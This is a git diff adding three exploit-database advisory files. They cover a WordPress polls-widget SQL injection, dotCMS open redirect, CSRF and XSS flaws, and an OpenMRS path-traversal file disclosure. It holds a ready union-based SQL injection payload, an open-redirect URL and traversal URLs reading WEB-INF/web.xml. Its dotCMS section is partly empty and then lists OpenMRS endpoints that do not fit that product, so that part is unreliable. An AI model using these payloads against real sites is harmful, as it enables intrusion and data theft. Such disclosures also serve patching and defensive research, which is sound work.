b/platforms/php/webapps/38902.txt new file mode 100755 index 000000000..6e78a54b6 --- /dev/null +++ b/platforms/php/webapps/38902.txt @@ -0,0 +1,29 @@ +Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability +Author : WICS +Date : 7/12/2015 +Software Link : https://wordpress.org/plugins/polls-widget/ +Affected Version: 1.0.7 and below + + +Overview: + + +Poll widget is wordpress plugin which provide fancy user Polling layout to website users and user can vote according to options provided in specific poll. +This plugin has 2000+ active installations. +Vulnerability exist in front_end.php file in which code is not filtering user supplied data on parameter question_id +line no. 36 $question_id=$_POST['question_id']; +.... +.... +line no. 94--> $answer=$wpdb->get_results('SELECT `answer_name`,`vote` FROM '.$wpdb->prefix.'polls WHERE question_id='.$question_id,ARRAY_A); + print_r(json_encode($answer, JSON_FORCE_OBJECT)); + +this script is vulnerable to union based sql injection with column count 2 + + +POC + +http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues + +in post data, add this + +question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5 diff --git a/platforms/php/webapps/38906.txt b/platforms/php/webapps/38906.txt new file mode 100755 index 000000000..4493a0954 --- /dev/null +++ b/platforms/php/webapps/38906.txt @@ -0,0 +1,120 @@ + +dotCMS 3.2.4 Multiple Vulnerabilities + + +Vendor: dotCMS Software, LLC +Product web page: http://www.dotcms.com +Affected version: 3.2.4 (Enterprise) + +Summary: DotCMS is the next generation of Content Management System (CMS). +Quick to deploy, open source, Java-based, open APIs, extensible and massively +scalable, dotCMS can rapidly deliver personalized, engaging multi-channel +sites, web apps, campaigns, one-pagers, intranets - all types of content +driven experiences - without calling in your developers. + +Desc: The application suffers from multiple security vulnerabilities including: +Open Redirection, multiple Stored and Reflected XSS and Cross-Site Request +Forgery (CSRF). + +Tested on: Apache-Coyote/1.1 + + +Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5290 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php + +Vendor: http://dotcms.com/docs/latest/change-log + https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305 + https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3 + + +19.11.2015 + +-- + + +1. Open Redirect via '_EXT_LANG_redirect' GET parameter: +-------------------------------------------------------- + +http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia + + + +2. CSRF Add Admin: +------------------ + + + +
+ + +
+ + + + + +3. Multiple Stored And Reflected XSS: +------------------------------------- + +POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1 +Host: 127.0.0.1 + +callCount=1 +windowName=c0-param0 +c0-scriptName=TagAjax +c0-methodName=addTag +c0-id=0 +c0-param0= + +http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addName parameter] +http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter] +http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter] +http://127.0.0.1:8080/openmrs/admin/users/users.list [Referer HTTP header] +http://127.0.0.1:8080/openmrs/admin/users/user.form [userId parameter] +http://127.0.0.1:8080/openmrs/options.form [defaultLocation parameter] +http://127.0.0.1:8080/openmrs/options.form [lang parameter] +http://127.0.0.1:8080/openmrs/options.form [newPassword parameter] +http://127.0.0.1:8080/openmrs/options.form [oldPassword parameter] +http://127.0.0.1:8080/openmrs/options.form [personName.familyName parameter] +http://127.0.0.1:8080/openmrs/options.form [personName.givenName parameter] +http://127.0.0.1:8080/openmrs/options.form [secretAnswerNew parameter] +http://127.0.0.1:8080/openmrs/options.form [secretQuestionPassword parameter] +http://127.0.0.1:8080/openmrs/options.form [username parameter] +http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [addUserAccount parameter] +http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [familyName parameter] +http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [gender parameter] +http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [givenName parameter] +http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [username parameter] +http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [definitionUiResource parameter] +http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [returnUrl parameter] +http://127.0.0.1:8080/openmrs/login.htm [sessionLocation parameter] +http://127.0.0.1:8080/openmrs/referenceapplication/userApp.page [action parameter] +http://127.0.0.1:8080/openmrs/uicommons/messages/get.action [codes parameter] +http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [description parameter] +http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [name parameter] +http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parameterName parameter] +http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parentUUID parameter] +http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [reportId parameter] +http://127.0.0.1:8080/openmrs/admin/reports/reportMacros.form [macros parameter] +http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [reportSchemaId parameter] +http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [xml parameter] +http://127.0.0.1:8080/openmrs/admin/reports/runReport.form [schedule parameter] +http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter] +http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm [id parameter] +http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [cancelCallback parameter] +http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [label parameter] +http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [saveCallback parameter] +http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [valueType parameter] +http://127.0.0.1:8080/openmrs/module/metadatasharing/export/edit.form [type parameter] +http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [concept parameter] +http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [instructions parameter] +http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [orderType parameter] +http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [patient parameter] +http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addAge parameter] +http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter] +http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter] +http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [description parameter] +http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [name parameter] +http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [taskClass parameter] +http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.list [taskId parameter] +http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter] +http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben_GB%5D.name parameter] +http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bfr%5D.name parameter] +http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bht%5D.name parameter] +http://127.0.0.1:8080/openmrs/dictionary/concept.form [synonymsByLocale%5Ben%5D%5B0%5D.name parameter] +http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [description parameter] +http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [name parameter] +http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [ruleContent parameter] +http://127.0.0.1:8080/openmrs/module/logic/logic.form [patientId parameter] +http://127.0.0.1:8080/openmrs/patientDashboard.form [patientGraphConcept parameter] \ No newline at end of file diff --git a/platforms/xml/webapps/38899.txt b/platforms/xml/webapps/38899.txt new file mode 100755 index 000000000..db32ef505 --- /dev/null +++ b/platforms/xml/webapps/38899.txt @@ -0,0 +1,45 @@ +OpenMRS 2.3 (1.11.4) Local File Disclosure Vulnerability + + +Vendor: OpenMRS Inc. +Product web page: http://www.openmrs.org +Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0) + OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b)) + +Summary: OpenMRS is an application which enables design +of a customized medical records system with no programming +knowledge (although medical and systems analysis knowledge +is required). It is a common framework upon which medical +informatics efforts in developing countries can be built. + +Desc: OpenMRS suffers from a file disclosure vulnerability +when input passed thru the 'url' parameter to viewPortlet.htm +script is not properly verified before being used to include +files. This can be exploited to include files from local +resources with directory traversal attacks. + + +Tested on: Ubuntu 12.04.5 LTS + Apache Tomcat/7.0.26 + Apache Tomcat/6.0.36 + Apache Coyote/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5286 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5286.php + +Vendor: https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868 + + +02.11.2015 + +-- + + +http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d +http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportProcessorPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx +http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fMETA-INF%2fmaven%2forg.openmrs.web%2fopenmrs-webapp%2fpom.xml%3bx%3d \ No newline at end of file